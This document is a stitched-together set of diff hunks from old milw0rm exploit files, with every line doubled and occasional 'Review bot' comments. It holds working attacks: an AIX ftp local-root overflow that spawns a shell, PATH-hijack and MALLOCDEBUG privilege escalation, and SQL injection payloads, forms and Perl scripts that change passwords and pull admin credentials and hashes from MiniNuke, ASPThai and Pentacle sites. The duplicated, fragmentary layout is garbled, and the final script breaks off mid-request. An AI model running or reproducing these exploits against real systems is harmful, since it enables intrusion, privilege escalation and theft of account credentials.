setuid(geteuid()); setuid(geteuid());
putenv("HISTFILE=/dev/null"); putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL); execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL); execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl"); perror("[-] execl");
exit(1); exit(1);
} }
printf("----------------------------\n"); printf("----------------------------\n");
printf(" AIX ftp Local Root Exploit\n"); printf(" AIX ftp Local Root Exploit\n");
printf(" By qaaz\n"); printf(" By qaaz\n");
printf("----------------------------\n"); printf("----------------------------\n");
if (pipe(pi) < 0 || pipe(po) < 0) { if (pipe(pi) < 0 || pipe(po) < 0) {
perror("[-] pipe"); perror("[-] pipe");
exit(1); exit(1);
} }
addr = get_addr(argv, envp, args, envs); addr = get_addr(argv, envp, args, envs);
if ((child = fork()) < 0) { if ((child = fork()) < 0) {
perror("[-] fork"); perror("[-] fork");
exit(1); exit(1);
} }
if (child == 0) { if (child == 0) {
dup2(pi[0], 0); dup2(pi[0], 0);
dup2(po[1], 1); dup2(po[1], 1);
dup2(po[1], 2); dup2(po[1], 2);
execve(TARGET, args, envs); execve(TARGET, args, envs);
perror("[-] execve"); perror("[-] execve");
exit(1); exit(1);
} }
write(pi[1], "macdef foo\n\n$\nfoo ab", 20); write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
for (i = 0; i < OVERLEN; i += sizeof(addr)) for (i = 0; i < OVERLEN; i += sizeof(addr))
write(pi[1], &addr, sizeof(addr)); write(pi[1], &addr, sizeof(addr));
write(pi[1], "\n", 1); write(pi[1], "\n", 1);
fflush(stdout); fflush(stdout);
fflush(stderr); fflush(stderr);
close(pi[0]); close(pi[0]);
close(po[1]); close(po[1]);
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 }); shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
kill(child, SIGTERM); kill(child, SIGTERM);
waitpid(child, NULL, 0); waitpid(child, NULL, 0);
return 0; return 0;
} }
// milw0rm.com [2007-07-27] // milw0rm.com [2007-07-27]

@ -20,6 +20,6 @@ export PATH
/usr/sbin/invscout /usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./" PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH export PATH
exec /tmp/ksh exec /tmp/ksh
# milw0rm.com [2005-03-25] # milw0rm.com [2005-03-25]

@ -1,33 +1,33 @@
#!/bin/bash #!/bin/bash
################################################################# #################################################################
# _______ _________ _ # # _______ _________ _ #
# ( ____ )\__ __/( ( /| # # ( ____ )\__ __/( ( /| #
# | ( )| ) ( | \ ( | # # | ( )| ) ( | \ ( | #
# | (____)| | | | \ | | # # | (____)| | | | \ | | #
# | __) | | | (\ \) | # # | __) | | | (\ \) | #
# | (\ ( | | | | \ | # # | (\ ( | | | | \ | #
# | ) \ \__ | | | ) \ | # # | ) \ \__ | | | ) \ | #
# |/ \__/ )_( |/ )_) # # |/ \__/ )_( |/ )_) #
# http://root-the.net # # http://root-the.net #
################################################################# #################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability # #[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
#[+] Refer : securitytracker.com/id?1022261 # #[+] Refer : securitytracker.com/id?1022261 #
#[+] Exploit : Affix <root@root-the.net> # #[+] Exploit : Affix <root@root-the.net> #
#[+] Tested on : IBM AIX # #[+] Tested on : IBM AIX #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, # #[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull # # str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
# AIX 5.3 ML 5 is where this bad libc code was added. # # AIX 5.3 ML 5 is where this bad libc code was added. #
# Libs Affected : # # Libs Affected : #
# /usr/ccs/lib/libc.a # # /usr/ccs/lib/libc.a #
# /usr/ccs/lib/libp/libc.a # # /usr/ccs/lib/libp/libc.a #
################################################################# #################################################################
Set the following environment variables: Set the following environment variables:
umask 000 umask 000
MALLOCTYPE=debug MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename MALLOCDEBUG=report_allocations,output:/bin/filename
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions." echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
# milw0rm.com [2009-07-30] # milw0rm.com [2009-07-30]
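Review bot: as stored, this file is an advisory note rather than a runnable script: after the `#!/bin/bash` shebang and the comment banner, the line "Set the following environment variables:" is prose, so bash would report `Set: command not found` and fall through to the assignments and the final echo, which is not what the file claims to do. If the archive intends it as a description, a .txt extension would describe it more honestly than a shell script.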

@ -35,6 +35,6 @@ unsigned int code[]={
80010444 lwz r0,1092(SP) --jump 80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0 7c0903a6 mtspr CTR,r0
4e800420 bctr --jump 4e800420 bctr --jump
*/ */
# milw0rm.com [2004-09-26] # milw0rm.com [2004-09-26]

@ -71,6 +71,6 @@ print "User: admin\n";
print "Pass: trapset\n\n"; print "Pass: trapset\n\n";
print "Enjoy ;)\n"; print "Enjoy ;)\n";
print "\n"; print "\n";
### EOF ### ### EOF ###
# milw0rm.com [2005-05-26] # milw0rm.com [2005-05-26]

@ -30,6 +30,6 @@ print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo') or M_Name=
print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">"; print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
print "</form>"; print "</form>";
} }
?> ?>
# milw0rm.com [2005-05-26] # milw0rm.com [2005-05-26]

@ -33,6 +33,6 @@ size="150">
<br> <br>
<input name="Submit" type="submit" value="Submit"> <input name="Submit" type="submit" value="Submit">
</form> </form>
-----------------End------------------- -----------------End-------------------
# milw0rm.com [2005-05-26] # milw0rm.com [2005-05-26]

@ -32,6 +32,6 @@ firstname : <input name="firstname" value="Crkchat" type="text" size="50">
<!-- <!--
----------------------------------- -----------------------------------
Now u can use forgot password to gain passwords! --> Now u can use forgot password to gain passwords! -->
# milw0rm.com [2005-05-27] # milw0rm.com [2005-05-27]

@ -47,6 +47,6 @@ print "Wait For Changing Password ...\n";
print "[+]OK , Now Login With : \n"; print "[+]OK , Now Login With : \n";
print "Username: trapset\n"; print "Username: trapset\n";
print "Password: trapset\n\n"; print "Password: trapset\n\n";
# milw0rm.com [2005-06-27] # milw0rm.com [2005-06-27]

@ -23,6 +23,6 @@ $page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of admin
print "[-] Unable to retrieve Username\n" if(!$1); print "[-] Unable to retrieve Username\n" if(!$1);
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!"; $page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n"; $page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1); print "[-] Unable to retrieve hash of password\n" if(!$1);
# milw0rm.com [2005-06-27] # milw0rm.com [2005-06-27]

@ -104,6 +104,6 @@ hostcustid: <input type="TEXT" name="hostcustid" ID="hostcustid" value="1"><tr>
</td> </td>
</tr> </tr>
</table> </table>
</form> </form>
# milw0rm.com [2005-07-18] # milw0rm.com [2005-07-18]

@ -1,44 +1,44 @@
<!-- <!--
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address Save this code as .htm and replace [SITE]/[SQLCODE] to your server address
Some SQL Examples: Some SQL Examples:
-Changing character data- -Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';-- update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--
Classcodes arE: Classcodes arE:
0: Dark Wizard 0: Dark Wizard
1: Soul Master 1: Soul Master
16: Dark knight 16: Dark knight
17: Blade knight 17: Blade knight
32: Elf 32: Elf
33: Muse Elf 33: Muse Elf
48: Magic Gladiator 48: Magic Gladiator
64: Dark Lord 64: Dark Lord
Ctlcode is admin level code: Ctlcode is admin level code:
0:Normal 0:Normal
1: Blocked 1: Blocked
8: GM 8: GM
16: GM LVL2 16: GM LVL2
-Blasting Vault- -Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';-- update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--
ITEMCODE is which u can get from itemproject.exe u can find it on google ;) ITEMCODE is which u can get from itemproject.exe u can find it on google ;)
-Changing Account Password- -Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';-- update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
Enjoy Enjoy
--> -->
<html> <html>
<form action="http://[SITE]/pkok.asp" method="post"> <form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant"> <input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject"> <input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]"> <input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!"> <input type="submit" name="submit" value="Do IT!">
</form> </form>
</html> </html>
# milw0rm.com [2005-10-15] # milw0rm.com [2005-10-15]

@ -1,59 +1,59 @@
Contacts:{ Contacts:{
ICQ: 10072 ICQ: 10072
MSN/Email: nukedx@nukedx.com MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com Web: http://www.nukedx.com
} }
--- ---
Vendor: MiniNuke (www.miniex.net) Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected. Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp About:Via this method remote attacker can inject SQL query to the news.asp
--- ---
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery] How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52 http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
Columns of MEMBERS: Columns of MEMBERS:
uye_id = userid uye_id = userid
sifre = md5 password hash sifre = md5 password hash
g_soru = secret question. g_soru = secret question.
g_cevap = secret answer g_cevap = secret answer
email = mail address email = mail address
isim = name isim = name
icq = ICQ Uin icq = ICQ Uin
msn = MSN Sn. msn = MSN Sn.
aim = AIM Sn. aim = AIM Sn.
meslek = job meslek = job
cinsiyet = gender cinsiyet = gender
yas = age yas = age
url = url url = url
imza = signature imza = signature
mail_goster = show mail :P mail_goster = show mail :P
avurl = avatar url avurl = avatar url
avatar = avatar avatar = avatar
--- ---
Vendor: MiniNuke (www.miniex.net) Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected. Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without login. About:Via this method remote attacker can change any users password without login.
--- ---
How&Example: How&Example:
HTML Example HTML Example
[code] [code]
<html> <html>
<title>MiniNuke <= 1.8.2 remote user password change</title> <title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew"> <form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%"> <table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr> <tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr> <tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td> <tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr> <td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td> <tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">&nbsp;&nbsp; <td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">&nbsp;&nbsp;
<input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr> <input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr>
</table></form> </table></form>
</html> </html>
[/code] [/code]
# milw0rm.com [2006-01-14] # milw0rm.com [2006-01-14]
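Review bot: the header claim "1.8.2 and prior versions must be affected" is an untested assertion and should read "may be affected" unless the earlier versions were actually checked; the hunk header shows 53 lines on both sides with nothing marked added or removed, so this revision changes no content. In the form, `<font face=tahoma size=1red>` is broken markup (a colour value fused onto the size attribute), and the `[code]` / `[/code]` tags are forum BBCode, not HTML, so the snippet cannot be saved and opened as-is without stripping them. What the PoC documents for a defender is that `membership.asp?action=lostpassnew` accepts `pass`, `passa` and a member name `x` with no session and no reset token; the fix is to tie any password change to an authenticated session or to a single-use token delivered out of band.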


@ -1,53 +1,53 @@
#!/usr/bin/perl #!/usr/bin/perl
# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit. # MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit.
# This exploit uses the vulnerability discovered by nukedx@nukedx.com. # This exploit uses the vulnerability discovered by nukedx@nukedx.com.
# Exploit uses SQl-injection to give you the hash from user with chosen id. # Exploit uses SQl-injection to give you the hash from user with chosen id.
# DetMyl, 2006 Detmyl@bk.ru # DetMyl, 2006 Detmyl@bk.ru
use IO::Socket; use IO::Socket;
if (@ARGV < 3) if (@ARGV < 3)
{ {
print q( print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)] Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128 i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++
); );
exit; exit;
} }
$serv = $ARGV[0]; $serv = $ARGV[0];
$dir = $ARGV[1]; $dir = $ARGV[1];
$uid = $ARGV[2]; $uid = $ARGV[2];
$proxy = $ARGV[3]; $proxy = $ARGV[3];
print "----------------------------------\n"; print "----------------------------------\n";
if ( defined $proxy) { if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg; $proxy =~ s/(http:\/\/)//eg;
($proxyAddr,$proxyPort) = split(/:/, $proxy); ($proxyAddr,$proxyPort) = split(/:/, $proxy);
} }
$serv =~ s/(http:\/\/)//eg; $serv =~ s/(http:\/\/)//eg;
$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid; $request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid;
print "Connecting to: $serv...\n"; print "Connecting to: $serv...\n";
print $proxy?"Using proxy: $proxy \n":""; print $proxy?"Using proxy: $proxy \n":"";
$socket = IO::Socket::INET->new( Proto => "tcp", $socket = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $proxyAddr?"$proxyAddr":"$serv", PeerAddr => $proxyAddr?"$proxyAddr":"$serv",
PeerPort => $proxyPort?"$proxyPort":"80") PeerPort => $proxyPort?"$proxyPort":"80")
|| die "can't connect to: $serv\n"; || die "can't connect to: $serv\n";
print $socket "GET $request HTTP/1.1\n"; print $socket "GET $request HTTP/1.1\n";
print $socket "Host: $serv\n"; print $socket "Host: $serv\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /<b>([\d,a-f]{32})<\/b>/) { if ($answer =~ /<b>([\d,a-f]{32})<\/b>/) {
print "+ Found! The hash for user $uid: $1\n"; print "+ Found! The hash for user $uid: $1\n";
print "----------------------------------\n"; print "----------------------------------\n";
exit(); } exit(); }
if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); } if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); }
} }
print "Exploit failed\n"; print "Exploit failed\n";
print "--------------------------\n"; print "--------------------------\n";
# milw0rm.com [2006-01-14] # milw0rm.com [2006-01-14]
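Review bot: the hash regex `/<b>([\d,a-f]{32})<\/b>/` has a comma inside the character class, so it also accepts commas; `[0-9a-f]{32}` is what an MD5 hex digest needs. The request is written as `GET $request HTTP/1.1` with bare `\n` line endings rather than `\r\n`, which only lenient servers accept, and when a proxy is given the same absolute-URI request line is sent with `Host: $serv`, which is correct for the proxy case but should be the explicit intent rather than a coincidence. Minor: the `e` flag on `s/(http:\/\/)//eg` evaluates an empty expression and is unnecessary, and the script runs without `use strict` or `use warnings`. User-facing strings carry the typos "querry" and "scrypt". The `number of columns` branch depends on the application rendering a database error to the client, which is itself a finding for the vendor to fix alongside parameterising `hid`.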


@ -1,93 +1,93 @@
#!/usr/bin/perl #!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5 # SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
#(And possible higher could not find a site to test it on) #(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In plain text # This exploit shows the username of the administrator and the password In plain text
# Bug Found by muderskillz Coded by Zodiac # Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot. # Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net # http://exploitercode.com/ http://www.g00ns.net
#irc.g00ns.net #g00ns email = zodiac@g00ns.net #irc.g00ns.net #g00ns email = zodiac@g00ns.net
#(c) 2006 #(c) 2006
use LWP::UserAgent; use LWP::UserAgent;
use HTTP::Cookies; use HTTP::Cookies;
$Server = $ARGV[0]; $Server = $ARGV[0];
if($Server =~m/http/g) if($Server =~m/http/g)
{ {
$Server=~ 'http://$Server'; $Server=~ 'http://$Server';
print print
} }
else { else {
print $error; print $error;
} }
if(!$Server) {usage();exit() ;} if(!$Server) {usage();exit() ;}
head(); head();
print "\r\nGrabbing Username And Password\r\n\n"; print "\r\nGrabbing Username And Password\r\n\n";
#Login's and stores a cookie to view admin panel later #Login's and stores a cookie to view admin panel later
$xpl = LWP::UserAgent->new() or die; $xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new(); $cookie_jar = HTTP::Cookies->new();
$xpl->agent('g00ns'); $xpl->agent('g00ns');
$xpl->cookie_jar($cookie_jar); $xpl->cookie_jar($cookie_jar);
$res = $xpl->post( $res = $xpl->post(
$Server.'check_user.asp', $Server.'check_user.asp',
Content => [ Content => [
'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', 'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', 'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'Submit' => '-= Login =-', 'Submit' => '-= Login =-',
], ],
); );
# Create a request # Create a request
my $req = HTTP::Request->new(GET => my $req = HTTP::Request->new(GET =>
$Server.'change_admin_username.asp' $Server.'change_admin_username.asp'
); );
$req->header('Referer', $Server.'admin_menu.asp'); $req->header('Referer', $Server.'admin_menu.asp');
my $res = $xpl->request($req); my $res = $xpl->request($req);
$info= $res->content; $info= $res->content;
if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
{ {
die "Error Connecting...\r\n"; die "Error Connecting...\r\n";
} }
#Check the outcome of the response #Check the outcome of the response
$info=~m/(value=\")(\n+|\w+|\W+)/g; $info=~m/(value=\")(\n+|\w+|\W+)/g;
$User = $2; $User = $2;
$info=~m/(value=\")(\n+|\w+|\W+)/g; $info=~m/(value=\")(\n+|\w+|\W+)/g;
$Pass= $2; $Pass= $2;
print "UserName:$User\r\nPassword:$Pass\r\n"; print "UserName:$User\r\nPassword:$Pass\r\n";
sub head() sub head()
{ {
print "\n=======================================================================\r\n"; print "\n=======================================================================\r\n";
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n"; print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n";
print "=======================================================================\r\n"; print "=======================================================================\r\n";
} }
sub usage() sub usage()
{ {
head(); head();
print " Usage: Thaisql.pl <Site> \r\n\n"; print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n"; print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
print "=======================================================================\r\n"; print "=======================================================================\r\n";
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n"; print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n"; print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
print "=======================================================================\r\n"; print "=======================================================================\r\n";
# milw0rm.com [2006-02-06] # milw0rm.com [2006-02-06]
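Review bot: the URL normalisation at the top is a no-op with inverted logic: `if($Server =~m/http/g)` takes the branch when "http" is already present, and `$Server=~ 'http://$Server'` is a pattern match against a single-quoted string, not an assignment, so `$Server` is never prefixed; the `else` branch prints `$error`, which is never set. The intended behaviour is the opposite, e.g. `$Server = "http://$Server" unless $Server =~ m{^http://};`. `my $res` on the GET is declared after the un-`my`'d `$res` of the login post, which would not pass `use strict`. The extraction regex `m/(value=\")(\n+|\w+|\W+)/g` captures a single run of word or non-word characters, so a password mixing letters and symbols is truncated at the first class change. The tautology payload placed in `txtUserName` and `txtUserPass` is the textbook case that `check_user.asp` should be rejecting by using parameterised queries rather than string-concatenated SQL.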


@ -1,50 +1,50 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Orginal advisory: http://www.nukedx.com/?viewdoc=9 #Orginal advisory: http://www.nukedx.com/?viewdoc=9
#Usage: mini.pl <victim.com> </mininuke-dir> <userid> #Usage: mini.pl <victim.com> </mininuke-dir> <userid>
use IO::Socket; use IO::Socket;
if(@ARGV != 3){ if(@ARGV != 3){
print " print "
+**********************************************************************+ +**********************************************************************+
+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+ +Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
+ Usage: mini.pl <victim> <directory> <userid> + + Usage: mini.pl <victim> <directory> <userid> +
+ Example: mini.pl sux.com / 1 + + Example: mini.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx + + Method found & Exploit scripted by nukedx +
+**********************************************************************+ +**********************************************************************+
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$port = "80"; $port = "80";
$mndir = $ARGV[1]; $mndir = $ARGV[1];
$victimid = $ARGV[2]; $victimid = $ARGV[2];
$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid; $sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $mns "GET $sreq\n"; print $mns "GET $sreq\n";
print $mns "Host: $server\n"; print $mns "Host: $server\n";
print $mns "Accept: */*\n"; print $mns "Accept: */*\n";
print $mns "Connection: close\n\n"; print $mns "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
while($answer = <$mns>) { while($answer = <$mns>) {
if ($answer =~ /([\d,a-f]{32})/) { if ($answer =~ /([\d,a-f]{32})/) {
print "+ USERID: $victimid\n"; print "+ USERID: $victimid\n";
print "+ MD5 HASH: $1\n"; print "+ MD5 HASH: $1\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); } exit(); }
if ($answer =~ /number of columns/) { if ($answer =~ /number of columns/) {
print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n"; print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
print "+ So please edit query by manually adding null data..\n"; print "+ So please edit query by manually adding null data..\n";
exit(); } exit(); }
} }
print "+ Exploit failed\n"; print "+ Exploit failed\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# nukedx.com [2006-02-19] # nukedx.com [2006-02-19]
# milw0rm.com [2006-02-19] # milw0rm.com [2006-02-19]
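Review bot: `print $mns "GET $sreq\n"` sends a request line with no HTTP version, i.e. an HTTP/0.9-style request, after which the `Host`, `Accept` and `Connection` headers are meaningless to a server that honours 0.9 and malformed to one that does not; it should be `GET $sreq HTTP/1.0\r\n` with `\r\n` terminating every header line. The match `/([\d,a-f]{32})/` includes a comma in the class and is unanchored, so any 32-character run of digits, commas and a-f anywhere in the response (including the injected `0,kul_adi,sifre,0,0` text if the page echoes the query) is reported as the hash; use `\b[0-9a-f]{32}\b`. The `number of columns` branch relies on a database error being rendered in the page, which is itself a finding: `pages.asp` both concatenates `id` into SQL and discloses SQL errors to the client.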


@ -1,70 +1,70 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: penta.pl <victim> <directory> #Usage: penta.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=14 #Original Advisory: http://www.nukedx.com/?viewdoc=14
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
+***********************************************************************+ +***********************************************************************+
+Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+ +Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+
+ Usage: penta.pl <victim> <directory> <userid> + + Usage: penta.pl <victim> <directory> <userid> +
+ Example: penta.pl sux.com / 1 + + Example: penta.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx + + Method found & Exploit scripted by nukedx +
+***********************************************************************+ +***********************************************************************+
"; ";
exit(); exit();
} }
#Local variables #Local variables
$pentaserver = $ARGV[0]; $pentaserver = $ARGV[0];
$pentaserver =~ s/(http:\/\/)//eg; $pentaserver =~ s/(http:\/\/)//eg;
$pentahost = "http://".$pentaserver; $pentahost = "http://".$pentaserver;
$port = "80"; $port = "80";
$pentadir = $ARGV[1]; $pentadir = $ARGV[1];
$pentaid = $ARGV[2]; $pentaid = $ARGV[2];
$pentatar = "newsdetailsview.asp?newsid="; $pentatar = "newsdetailsview.asp?newsid=";
$pentafinal = "login.asp"; $pentafinal = "login.asp";
$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes"; $pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes";
$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp; $pentareq = $pentahost.$pentadir.$pentatar.$pentaxp;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $pentaserver\n"; print "+ Trying to connect: $pentaserver\n";
$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n"; $penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $penta "GET $pentareq\n"; print $penta "GET $pentareq\n";
